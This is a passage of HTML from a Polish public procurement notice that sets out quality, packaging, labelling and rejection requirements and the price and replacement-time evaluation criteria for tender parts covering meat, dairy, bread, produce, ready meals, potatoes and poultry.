<span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – Sukcesywna dostawa mięsa i wędlin<br/>Wymagania dotyczące mięsa:<br/>􀀀 powierzchnia gładka, niezakrwawiona, niepostrzępiona, bez opiłków kości, przekrwień,<br/>pomiażdżonych kości, głębokich ponacinań, powierzchnia tkanki mięśniowej i tłuszczowej<br/>połyskująca, sucha lub lekko wilgotna; niedopuszczalna oślizgłość, nalot pleśni,<br/>􀀀 czystość – mięso czyste, bez śladów jakichkolwiek zanieczyszczeń,<br/>􀀀 barwa – mięśni jasnoróżowa do czerwonej, dopuszczalne zmatowienie, niedopuszczalny<br/>odcień szary lub zielonkawy; tłuszczu biała z odcieniem kremowym lub lekko różowym,<br/>􀀀 konsystencja – jędrna, elastyczna;<br/>􀀀 zapach – swoisty, charakterystyczny dla mięsa świeżego, bez oznak zaparzenia i<br/>rozpoczynającego się psucia, niedopuszczalny zapach obcy.<br/>Zawartość zanieczyszczeń w produkcie zgodnie z aktualnie obowiązującym prawem;<br/>Wymagania mikrobiologiczne zgodnie z aktualnie obowiązującym prawem.<br/>Trwałość - okres przydatności do spożycia deklarowany przez producenta powinien wynosić nie<br/>mniej niż 5 dni od daty dostawy do magazynu odbiorcy.<br/>Pakowanie – pojemniki plastikowe lub inne zapewniające higieniczną dostawę (materiał<br/>opakowaniowy dopuszczony do kontaktu z żywnością), zamkniętych pokrywą. Każdy asortyment<br/>produktów powinien być dostarczony w oddzielnym pojemniku.<br/>Oznakowanie opakowania powinno zawierać:<br/>􀀀 nazwę asortymentu,<br/>􀀀 dane identyfikujące producenta asortymentu,<br/>􀀀 dane identyfikujące miejsce pochodzenia,<br/>􀀀 zawartość netto asortymentu,<br/>􀀀 data minimalnej trwałości lub termin przydatności do spożycia,<br/>􀀀 warunki przechowywania,<br/>􀀀 oznaczenie partii produkcyjnej.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 obce posmaki, zapachy, obślizgłość, nalot pleśni, barwa szarozielona,<br/>􀀀 zastosowane środki konserwujące np. octany, askorbiniany, sól peklująca,<br/>􀀀 objawy obniżenia jędrności i elastyczności, objawy wskazujące na zaparzenie mięsa,<br/>􀀀 obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność<br/>szkodników oraz ich pozostałości;<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Wymagania dotyczące wędlin:<br/>Trwałość: okres przydatności do spożycia produktu deklarowany przez producenta powinien<br/>wynosić nie mniej niż 10 dni od daty dostawy do magazynu odbiorcy.<br/>Opakowania:<br/>􀀀 jednostkowe – może stanowić folia zawierająca oznaczenia wyrobów zgodnie z<br/>obowiązującymi w tym zakresie normami, przeznaczona do kontaktu z żywnością, pakowane w<br/>atmosferze modyfikowanej, gramatura opakowań musi mieścić się w przedziałach od 1/2 do 4 kg<br/>dla poszczególnych wyrobów;<br/>􀀀 transportowe – zamawiane produkty dostarczane będą w pojemnikach wykonanych z<br/>materiałów przeznaczonych do kontaktu z żywnością, zamkniętych pokrywą.<br/>Oznakowanie opakowania powinno zawierać:<br/>􀀀 nazwę produktu,<br/>􀀀 skład surowcowy produktu gotowego,<br/>􀀀 dane identyfikujące producenta produktu,<br/>􀀀 dane identyfikujące miejsce pochodzenia,<br/>􀀀 zawartość netto produktu,<br/>􀀀 data minimalnej trwałości lub termin przydatności do spożycia,<br/>􀀀 warunki przechowywania,<br/>􀀀 oznaczenie partii produkcyjnej.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 obce posmaki, zapachy, obślizgłość, nalot pleśni, barwa szarozielona, zawilgocenie<br/>powierzchni, uszkodzenie, połamanie, składniki użyte do produkcji zbyt rozdrobnione,<br/>pozaklasowe lub z chrząstkami, ścięgnami, itp., skupiska jednego ze składników,<br/>􀀀 obecność bakterii salmonelli w 25 g, gronkowców chorobotwórczych w 0,1 g i z grupy coli 0,1<br/>g, obecność szkodników oraz ich pozostałości,<br/>􀀀 brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia.<br/>Szczegółowy opis znajduje się w Załączniku nr 1 dla Części 3. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Sukcesywna dostawa nabiału<br/>Wymagania dotyczące nabiału (produkty mleczarskie):<br/>􀀀 opakowanie nienaruszone, czyste, brak zawilgocenia,<br/>􀀀 produkt o właściwej dla niego konsystencji,<br/>􀀀 zapach swoisty, bez obcego zapachu.<br/>Trwałość - okres przydatności do spożycia min. 75% okresu deklarowanego przez producenta,<br/>liczony od daty dostawy do magazynu odbiorcy.<br/>Pakowanie – Opakowania oryginalne producenta, przystosowane do kontaktu z żywnością.<br/>Opakowanie jednostkowe i zbiorcze musi zawierać etykietę producenta.<br/>Oznakowanie opakowania powinno zawierać co najmniej (odpowiednio do rodzaju produktu):<br/>􀀀 nazwy wyrobu,<br/>􀀀 wykazu składników (jeżeli jest ich więcej niż jeden podstawowy) oraz ich ilości,<br/>􀀀 wszelkich składników lub substancji powodujących alergie lub reakcje,<br/>􀀀 nazwa i adres firmy i/lub producenta,<br/>􀀀 ilości netto żywności,<br/>􀀀 daty minimalnej trwałości lub terminu przydatności do spożycia,<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 opakowania będą zniszczone, zawilgocone, brudne, wskazujące na ubytek produktu,<br/>􀀀 zapach, konsystencja wskazująca na produkt stary, zjełczały, zepsuty, z pleśnią,<br/>􀀀 obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność<br/>szkodników oraz ich pozostałości,<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Szczegółowy opis znajduje się w Załączniku nr 1 dla Części 4. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 – Sukcesywna dostawa pieczywa<br/>Wymagania dotyczące pieczywa:<br/>􀀀 opakowanie nienaruszone, czyste, brak zawilgocenia,<br/>􀀀 produkt świeży, wypieczony, nieprzypalony, bez pleśni,<br/>􀀀 kromki pieczywa nie kruszą się/rozpadają na części, konsystencja umożliwia swobodne<br/>smarowanie masłem, serkiem itp.,<br/>􀀀 zapach swoisty, bez obcego zapachu.<br/>Trwałość - okres przydatności do spożycia min. 75% okresu deklarowanego przez producenta,<br/>liczony od daty dostawy do magazynu odbiorcy.<br/>Pakowanie – Opakowania oryginalne producenta, przystosowane do kontaktu z żywnością.<br/>Dopuszczane jest opakowanie jednostopniowe. Opakowanie zbiorcze musi zawierać etykietę<br/>producenta.<br/>Oznakowanie opakowania powinno zawierać co najmniej (odpowiednio do rodzaju produktu):<br/>􀀀 nazwy wyrobu,<br/>􀀀 wykazu składników,<br/>􀀀 wszelkich składników lub substancji powodujących alergie lub reakcje,<br/>􀀀 nazwa i adres firmy i/lub producenta,<br/>􀀀 ilości netto żywności,<br/>􀀀 daty minimalnej trwałości lub terminu przydatności do spożycia.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 opakowania będą zniszczone, zawilgocone, brudne, wskazujące na ubytek produktu,<br/>􀀀 zapach, konsystencja wskazująca na produkt stary, zepsuty, z pleśnią,<br/>􀀀 obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność<br/>szkodników oraz ich pozostałości,<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Szczegółowy opis znajduje się w Załączniku nr 1 dla Części 5. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 – Sukcesywna dostawa świeżych owoców i warzyw<br/>Wymagania dotyczące owoców i warzyw:<br/>􀀀 owoce i warzywa całe, zdrowe, czyste,<br/>􀀀 wolne od chorób i szkodników,<br/>􀀀 o odpowiednim stopniu dojrzałości, nadające się do bezpośredniego użycia lub przeróbki,<br/>􀀀 zapach swoisty, bez obcego zapachu.<br/>Trwałość - okres przydatności do spożycia min. 75% okresu deklarowanego przez producenta,<br/>liczony od daty dostawy do magazynu odbiorcy.<br/>Pakowanie – Opakowania zbiorcze zawierające etykietę producenta. Czyste, trwałe,<br/>zabezpieczające towar przed rozsypaniem się.<br/>Oznakowanie opakowania powinno zawierać co najmniej (odpowiednio do rodzaju produktu):<br/>􀀀 nazwy wyrobu,<br/>􀀀 nazwa i adres firmy i/lub producenta,<br/>􀀀 ilości brutto żywności,<br/>􀀀 daty minimalnej trwałości lub terminu przydatności do spożycia.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 opakowania będą zniszczone, zawilgocone, brudne, wskazujące na ubytek produktu,<br/>􀀀 zapach, konsystencja wskazująca na produkt stary, zepsuty, z pleśnią,<br/>􀀀 obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność<br/>szkodników oraz ich pozostałości,<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Szczegółowy opis znajduje się w Załączniku nr 1 dla Części 6. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7 – Sukcesywna dostawa wyrobów garmażeryjnych niemrożonych<br/>Wymagania dotyczące gotowych produktów:<br/>􀀀 produkty gotowe (m.in. pierogi, kopytka, gołąbki itp.) ugotowane – gotowe do podgrzania (nie<br/>mrożone, mogą być schłodzone),<br/>􀀀 produkty w konsystencji zwarte – nie pokruszone, nie połamane,<br/>􀀀 produkty możliwe do podziału – nie posklejane,<br/>􀀀 zapach swoisty, bez obcego zapachu.<br/>Trwałość - okres przydatności do spożycia min. 75% okresu deklarowanego przez producenta,<br/>liczony od daty dostawy do magazynu odbiorcy.<br/>Pakowanie – Opakowania zbiorcze zawierające etykietę producenta. Czyste, trwałe,<br/>zabezpieczające towar przed rozsypaniem się.<br/>Oznakowanie powinno zawierać co najmniej (odpowiednio do rodzaju produktu):<br/>􀀀 nazwy wyrobu,<br/>􀀀 nazwa i adres firmy i/lub producenta,<br/>􀀀 ilości brutto żywności,<br/>􀀀 daty minimalnej trwałości lub terminu przydatności do spożycia,<br/>􀀀 składniki i wartości odżywcze,<br/>􀀀 sposób przygotowania do spożycia.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 opakowania będą zniszczone, zawilgocone, brudne, wskazujące na ubytek produktu,<br/>􀀀 zapach, konsystencja wskazująca na produkt stary, zepsuty, z pleśnią,<br/>􀀀 produkt sklejony w jedną „bryłkę”,<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Szczegółowy opis znajduje się w Załączniku nr 1 dla Części 7. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 8 – Sukcesywna dostawa ziemniaków (jadalne, białe)<br/>Wymagania dotyczące ziemniaków:<br/>􀀀 ziemniaki białe,<br/>􀀀 całe, zdrowe, czyste,<br/>􀀀 wolne od chorób i szkodników,<br/>􀀀 o odpowiednim stopniu dojrzałości, nadające się do bezpośredniego użycia lub przeróbki,<br/>􀀀 zapach swoisty, bez obcego zapachu.<br/>Trwałość - okres przydatności do spożycia min. 75% okresu deklarowanego przez producenta,<br/>liczony od daty dostawy do magazynu odbiorcy.<br/>Pakowanie – Opakowania zbiorcze zawierające etykietę producenta. Czyste, trwałe,<br/>zabezpieczające towar przed rozsypaniem się.<br/>Oznakowanie opakowania powinno zawierać co najmniej (odpowiednio do rodzaju produktu):<br/>􀀀 nazwy wyrobu,<br/>􀀀 nazwa i adres firmy i/lub producenta,<br/>􀀀 ilości brutto żywności,<br/>􀀀 daty minimalnej trwałości lub terminu przydatności do spożycia.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 opakowania będą zniszczone, zawilgocone, brudne, wskazujące na ubytek produktu,<br/>􀀀 zapach, konsystencja wskazująca na produkt stary, zepsuty, z pleśnią,<br/>􀀀 obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność<br/>szkodników oraz ich pozostałości,<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Szczegółowy opis zamówienia znajduje się w Załączniku nr 1 dla Części 8. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość godzin na wymianę produktów zareklamowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 9 – Sukcesywna dostawa drobiu świeżego<br/>Wymagania dotyczące drobiu:<br/>􀀀 powierzchnia gładka, niezakrwawiona, niepostrzępiona, bez opiłków kości, przekrwień,<br/>pomiażdżonych kości, głębokich ponacinań, powierzchnia tkanki mięśniowej i tłuszczowej<br/>połyskująca, sucha lub lekko wilgotna; niedopuszczalna oślizgłość, nalot pleśni,<br/>􀀀 czystość – mięso czyste, bez śladów jakichkolwiek zanieczyszczeń,<br/>􀀀 barwa – mięśni jasnoróżowa do czerwonej, dopuszczalne zmatowienie, niedopuszczalny<br/>odcień szary lub zielonkawy; tłuszczu biała z odcieniem kremowym lub lekko różowym,<br/>􀀀 konsystencja – jędrna, elastyczna;<br/>􀀀 zapach – swoisty, charakterystyczny dla mięsa świeżego, bez oznak zaparzenia i<br/>rozpoczynającego się psucia, niedopuszczalny zapach obcy.<br/>Zawartość zanieczyszczeń w produkcie zgodnie z aktualnie obowiązującym prawem;<br/>Wymagania mikrobiologiczne zgodnie z aktualnie obowiązującym prawem.<br/>Trwałość - okres przydatności do spożycia deklarowany przez producenta powinien wynosić nie<br/>mniej niż 5 dni od daty dostawy do magazynu odbiorcy.<br/>Pakowanie – pojemniki plastikowe lub inne zapewniające higieniczną dostawę (materiał<br/>opakowaniowy dopuszczony do kontaktu z żywnością), zamkniętych pokrywą. Każdy asortyment<br/>produktów powinien być dostarczony w oddzielnym pojemniku.<br/>Oznakowanie opakowania powinno zawierać:<br/>􀀀 nazwę asortymentu,<br/>􀀀 dane identyfikujące producenta asortymentu,<br/>􀀀 dane identyfikujące miejsce pochodzenia,<br/>􀀀 zawartość netto asortymentu,<br/>􀀀 data minimalnej trwałości lub termin przydatności do spożycia,<br/>􀀀 warunki przechowywania,<br/>􀀀 oznaczenie partii produkcyjnej.<br/>Towar będzie nieprzyjęty, jeżeli będą:<br/>􀀀 obce posmaki, zapachy, obślizgłość, nalot pleśni, barwa szarozielona,<br/>􀀀 zastosowane środki konserwujące np. octany, askorbiniany, sól peklująca,<br/>􀀀 objawy obniżenia jędrności i elastyczności, objawy wskazujące na zaparzenie mięsa,<br/>􀀀 obecność bakterii salmonelli, gronkowców chorobotwórczych i z grupy coli, obecność<br/>szkodników oraz ich pozostałości;<br/>􀀀 opakowania bez oznakowania, uszkodzone mechaniczne, zabrudzone.<br/>Szczegółowy opis zamówienia znajduje się w Załączniku nr 1 dla Części 9. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena ofertowa brutto” – C<br/>„Ilość godzin na wymianę produktów zareklamowanych” – I</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 